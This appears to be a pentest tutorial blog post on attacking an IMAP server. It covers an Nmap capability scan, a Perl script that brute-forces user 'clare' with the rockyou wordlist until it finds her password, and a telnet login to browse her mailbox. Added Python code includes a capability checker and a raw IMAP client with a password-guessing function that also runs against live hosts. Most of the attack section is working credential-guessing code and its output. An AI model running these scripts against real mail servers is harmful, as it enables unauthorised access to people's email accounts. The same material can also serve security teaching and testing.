Monday, September 23, 2019

Exploring IMAP Servers

Scanning the Remote Host

We can use Nmap to scan the remote IMAP server and run its default enumeration scripts against it to see what the server supports. Note that the imap-capabilities script in this Nmap version tokenises the server's whole reply, so words from Dovecot's status line ("Pre-login capabilities listed, post-login capabilities have more.") are mixed in with the real capability names. The tokens that matter are IMAP4rev1, AUTH=PLAIN, SASL-IR, IDLE, ID, ENABLE, LITERAL+ and LOGIN-REFERRALS; STARTTLS is not among them, so this port accepts logins in cleartext only.

root@asus:~% nmap -p 143 -sC 148.32.42.5

Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-23 12:39 MDT
Nmap scan report for mail.acme.com (148.32.42.5)
Host is up (0.00013s latency).
PORT    STATE SERVICE
143/tcp open  imap
|_imap-capabilities: AUTH=PLAINA0001 SASL-IR IDLE more IMAP4rev1 have ID capabilities OK ENABLE Pre-login post-login LITERAL+ listed LOGIN-REFERRALS

Nmap done: 1 IP address (1 host up) scanned in 2.21 seconds
root@asus:~%
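The capability check Nmap is doing here, as an added example that is not part of the original post: a small Python helper that parses the capability list straight from the server's own greeting (the form Dovecot sends before any LOGIN) and flags the combinations a tester cares about, namely no STARTTLS, no LOGINDISABLED, and a cleartext SASL mechanism such as AUTH=PLAIN. The sample greeting is constructed in the same form as this server's banner; the function names and the `fetch_greeting` helper are my own and are not part of Nmap.

```python
import re
import socket

# Constructed sample: a pre-login greeting in the form Dovecot sends it
# (the capability set advertised on port 143 before any LOGIN).
SAMPLE_GREETING = ("* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS "
                   "ID ENABLE IDLE AUTH=PLAIN] Dovecot ready.")

CAPABILITY_IN_RESP_CODE = re.compile(r"\[CAPABILITY ([^\]]+)\]")


def parse_capabilities(line):
    """Return the capability tokens from either form the server uses:
    an OK greeting carrying a [CAPABILITY ...] response code, or an
    untagged '* CAPABILITY ...' reply to the CAPABILITY command."""
    m = CAPABILITY_IN_RESP_CODE.search(line)
    if m:
        return set(m.group(1).split())
    prefix = "* CAPABILITY "
    if line.upper().startswith(prefix):
        return set(line[len(prefix):].split())
    raise ValueError("no capability list in %r" % line)


def assess(caps):
    """Flag the pre-login capability combinations that matter for credential
    exposure. Only meaningful on the list seen before LOGIN; the post-login
    list describes mailbox features, not authentication."""
    findings = []
    if "STARTTLS" not in caps:
        findings.append("no STARTTLS: the connection on this port cannot be upgraded to TLS")
    if "LOGINDISABLED" not in caps:
        findings.append("LOGINDISABLED not advertised: plaintext LOGIN is accepted without TLS")
    cleartext = sorted(c for c in caps if c in ("AUTH=PLAIN", "AUTH=LOGIN"))
    if cleartext:
        findings.append("cleartext SASL mechanism offered: " + ", ".join(cleartext))
    return findings


def fetch_greeting(host, port=143, timeout=5):
    """Read the banner line from a live server (network call; not used offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return sock.makefile("r", encoding="ascii", errors="replace").readline().rstrip("\r\n")


if __name__ == "__main__":
    for finding in assess(parse_capabilities(SAMPLE_GREETING)):
        print("[!] " + finding)
```

Against a live host the same check is `assess(parse_capabilities(fetch_greeting("mail.acme.com")))`. Run it on the greeting, not on the list returned after LOGIN: the post-login capability set is much longer and says nothing about how the password was transported.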

Finding logins for valid IMAP users

We got a valid username, 'clare', from a pentest against another service, but we do not know her password. We can write a small Perl script that tries a wordlist against the IMAP host using the Net::IMAP::Simple module. Each guess is a real login attempt: Dovecot (which this server turns out to be) delays failed authentications and drops the connection after a few failures, and every attempt lands in the server's auth log, so the script opens a fresh connection per guess and stops at the first hit.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::IMAP::Simple;

my $host     = "mail.acme.com";
my $user     = "clare";
my $wordlist = "rockyou.txt";

open(my $fh, '<', $wordlist) or die "Cannot open $wordlist: $!";

print "[*] Searching for valid IMAP logins...\n";

while (my $pass = <$fh>) {
    chomp($pass);
    next if $pass eq '';

    # Fresh connection for every guess: the server drops the session after
    # a few failed LOGINs, so reusing one handle would silently fail for
    # every later password in the list.
    my $imap = Net::IMAP::Simple->new($host)
        or die "Unable to connect to $host: $Net::IMAP::Simple::errstr\n";

    if ($imap->login($user, $pass)) {
        print "[+] OK LOGIN | $user:$pass\n";
        $imap->quit();
        last;    # stop at the first password the server accepts
    }
    $imap->quit();
}
close($fh);

If we run the script:
root@asus:~% perl imap.pl 
[*] Searching for valid IMAP logins...
[+] OK LOGIN | clare:jessica
root@asus:~% 

As you can see, we now have a valid password for clare. Our next step is to explore the mailbox we just got access to.

Logging in to the IMAP server

We can telnet to the remote IMAP server and log in with the recovered credentials to browse the account's mailbox. Lines marked "ME ->" are what we typed; everything else is the server's reply. Note the greeting: AUTH=PLAIN is offered and STARTTLS is not, so the LOGIN below sends the password in cleartext on port 143, exactly as every guess the script made did.

root@asus:~% telnet 148.32.42.5 143
Trying 148.32.42.5...
Connected to 148.32.42.5.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN] Dovecot ready.
ME -> 1 LOGIN clare jessica
1 OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SPECIAL-USE] Logged in
ME -> 2 LIST "" "*"
* LIST (\HasNoChildren) "/" INBOX
2 OK List completed (0.000 + 0.000 secs).
ME -> 3 EXAMINE INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS ()] Read-only mailbox.
* 0 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1569265821] UIDs valid
* OK [UIDNEXT 1] Predicted next UID
* OK [HIGHESTMODSEQ 1] Highest
3 OK [READ-ONLY] Examine completed (0.000 + 0.000 secs).
ME -> 4 LOGOUT
* BYE Logging out
4 OK Logout completed.
Connection closed by foreign host.
root@asus:~% 

The mailbox is empty: 0 EXISTS means no messages, so there is nothing to read yet. EXAMINE opens a mailbox read-only and leaves its message flags untouched, which is the right choice while looking around; SELECT opens it read-write, and FETCH is what pulls headers and bodies once there are messages to pull.
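The exchange above, and the password search from the previous section, as an added example that is not part of the original post: a small raw-protocol IMAP client in Python that sends tagged commands and reads until the matching tagged reply, which is what the telnet session does by hand. ScriptedServer is a constructed stand-in that answers the way this page's Dovecot host did (its greeting, the AUTHENTICATIONFAILED reply, the LIST and EXAMINE data are modelled on the transcript above; the class and function names are my own), so the walkthrough runs offline; SocketConn is the cleartext transport for a live host on port 143.

```python
import re
import shlex
import socket


def imap_quote(s):
    """Quote a string per RFC 3501 so passwords with spaces or quotes survive."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


class RawImap:
    """Minimal tagged-command IMAP client over any object that provides
    readline() -> str and sendline(str)."""

    def __init__(self, conn):
        self.conn = conn
        self.seq = 0
        self.greeting = conn.readline()        # "* OK [CAPABILITY ...] ... ready."

    def command(self, cmd):
        """Send one tagged command; return (status, tagged_line, untagged_lines)."""
        self.seq += 1
        tag = "A%03d" % self.seq
        self.conn.sendline("%s %s" % (tag, cmd))
        untagged = []
        while True:
            line = self.conn.readline()
            if line.startswith(tag + " "):
                return line.split(" ", 2)[1], line, untagged   # OK / NO / BAD
            untagged.append(line)              # "* ..." data lines

    def login(self, user, password):
        status, _, _ = self.command("LOGIN %s %s" % (imap_quote(user), imap_quote(password)))
        return status == "OK"

    def list_mailboxes(self):
        _, _, lines = self.command('LIST "" "*"')
        return [l.rsplit(" ", 1)[1].strip('"') for l in lines if l.startswith("* LIST ")]

    def examine(self, mailbox):
        """Open a mailbox read-only; report message count and access mode."""
        status, tagged, lines = self.command("EXAMINE %s" % imap_quote(mailbox))
        counts = [int(m.group(1)) for m in (re.match(r"\* (\d+) EXISTS", l) for l in lines) if m]
        return {"ok": status == "OK", "read_only": "[READ-ONLY]" in tagged,
                "exists": counts[0] if counts else None}

    def logout(self):
        self.command("LOGOUT")


class SocketConn:
    """Cleartext transport for a live target (port 143, as on this page)."""

    def __init__(self, host, port=143, timeout=10):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.rfile = self.sock.makefile("r", encoding="ascii", errors="replace", newline="\r\n")

    def readline(self):
        return self.rfile.readline().rstrip("\r\n")

    def sendline(self, line):
        self.sock.sendall((line + "\r\n").encode("ascii"))


class ScriptedServer:
    """Constructed stand-in for the Dovecot host on this page: answers the
    commands the client uses so everything can be exercised offline."""

    def __init__(self, user, password):
        self.creds = (user, password)
        self.logged_in = False
        self.pending = ["* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS "
                        "ID ENABLE IDLE AUTH=PLAIN] Dovecot ready."]

    def readline(self):
        return self.pending.pop(0)

    def sendline(self, line):
        tag, verb, *args = shlex.split(line)   # shlex undoes IMAP quoted-strings well enough here
        verb = verb.upper()
        if verb == "LOGIN" and len(args) == 2:
            self.logged_in = tuple(args) == self.creds
            self.pending.append("%s OK Logged in" % tag if self.logged_in
                                else "%s NO [AUTHENTICATIONFAILED] Authentication failed." % tag)
        elif verb == "LIST" and self.logged_in:
            self.pending += ['* LIST (\\HasNoChildren) "/" INBOX', "%s OK List completed" % tag]
        elif verb == "EXAMINE" and self.logged_in:
            self.pending += ["* FLAGS (\\Answered \\Flagged \\Deleted \\Seen \\Draft)",
                             "* OK [PERMANENTFLAGS ()] Read-only mailbox.",
                             "* 0 EXISTS", "* 0 RECENT",
                             "%s OK [READ-ONLY] Examine completed" % tag]
        elif verb == "LOGOUT":
            self.pending += ["* BYE Logging out", "%s OK Logout completed" % tag]
        else:
            self.pending.append("%s BAD Error in IMAP command" % tag)


def find_password(user, candidates, connect):
    """Try each candidate on a fresh connection (the server drops a session
    after a few failed LOGINs) and return the first one it accepts."""
    for password in candidates:
        client = RawImap(connect())
        ok = client.login(user, password)
        client.logout()
        if ok:
            return password
    return None


def walkthrough(connect, user, password):
    """Reproduce the telnet session: LOGIN, LIST, EXAMINE INBOX, LOGOUT."""
    client = RawImap(connect())
    if not client.login(user, password):
        return None
    result = (client.list_mailboxes(), client.examine("INBOX"))
    client.logout()
    return result


if __name__ == "__main__":
    connect = lambda: ScriptedServer("clare", "jessica")
    found = find_password("clare", ["123456", "password", "jessica"], connect)  # constructed mini wordlist
    print(found, walkthrough(connect, "clare", found))
```

For a live host swap the factory for `lambda: SocketConn("mail.acme.com")` and feed `find_password` the wordlist; the client quotes both user and password, so a password containing a space or a double quote is sent correctly where the bare atoms typed into telnet above would not be.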
